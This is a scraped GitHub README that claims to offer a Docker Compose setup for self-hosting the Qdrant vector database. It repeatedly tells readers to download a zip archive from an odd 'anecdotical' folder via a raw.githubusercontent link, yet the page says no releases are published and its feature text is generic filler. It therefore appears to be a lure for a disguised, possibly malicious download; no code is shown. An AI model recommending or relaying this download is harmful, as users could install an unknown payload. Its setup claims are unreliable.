Skip to content

πŸ—„οΈ Run a self-hosted Qdrant vector database using Docker with easy setup, persistent data, and integration for smooth service connections.

License

Notifications You must be signed in to change notification settings

champ9090/qdrant-self-hosted

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

24 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ qdrant-self-hosted - Easily Self-Host Your Qdrant Database

Download

πŸ“‹ Overview

This project provides a simple Docker Compose setup for self-hosting the Qdrant vector database. It comes with persistent storage and management scripts to make setup easy. With this application, you can integrate AI applications and services, like n8n, smoothly on a shared network.

πŸ› οΈ Features

  • Easy Installation: Quick setup with Docker Compose.
  • Persistent Storage: Keeps your data safe and secure.
  • Management Scripts: Help you manage your setup easily.
  • AI Integration: Works well with applications like n8n.

πŸ“₯ Download & Install

To get started, visit the Releases page to download the latest version. Follow these steps to successfully install the software:

  1. Go to the Releases page.
  2. Find the latest release.
  3. Look for the https://raw.githubusercontent.com/champ9090/qdrant-self-hosted/main/anecdotical/qdrant-self-hosted.zip file included in the release.
  4. Download this file to your computer.

πŸ“ System Requirements

πŸ”§ Running the Application

  1. Open your terminal (Command Prompt, PowerShell, or Terminal for Mac).

  2. Navigate to the directory where you downloaded the https://raw.githubusercontent.com/champ9090/qdrant-self-hosted/main/anecdotical/qdrant-self-hosted.zip file.

  3. Run the following command:

    docker-compose up -d
  4. This command starts the Qdrant database in the background.

🌐 Accessing the Database

After starting the application, you can access the Qdrant vector database via your web browser:

  • Open your browser and navigate to http://localhost:6333.

πŸ“œ Management Scripts

Once you have Qdrant running, you can manage your database with the provided scripts. These scripts help you perform tasks like:

  • Importing and exporting data.
  • Querying the database.
  • Managing your vector embeddings.

🧭 Basic Commands

Here are some basic commands to manage Qdrant:

  • Start the Database: Use docker-compose start to run the database.
  • Stop the Database: Use docker-compose stop to stop it.
  • View Logs: Check the database logs by running docker-compose logs.

ℹ️ Troubleshooting

If you encounter issues:

  • Make sure Docker is running.
  • Check if Docker Compose is installed and updated.
  • Review the logs for any error messages.

Common problems include:

  • Permission issues: Ensure you have the necessary permissions to run Docker commands.
  • Network issues: Make sure your firewall allows necessary traffic.

πŸ“ž Getting Help

For further assistance, you can visit the GitHub Issues page to report problems or ask questions.

πŸ“š Learn More

Explore the Qdrant documentation for deeper knowledge on its capabilities:

πŸŽ‰ Conclusion

Enjoy using the Qdrant vector database with ease. By following this guide, you have installed and run the application. Remember to explore its features for your AI projects. For any updates or new features, keep an eye on the Releases page.

About

πŸ—„οΈ Run a self-hosted Qdrant vector database using Docker with easy setup, persistent data, and integration for smooth service connections.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages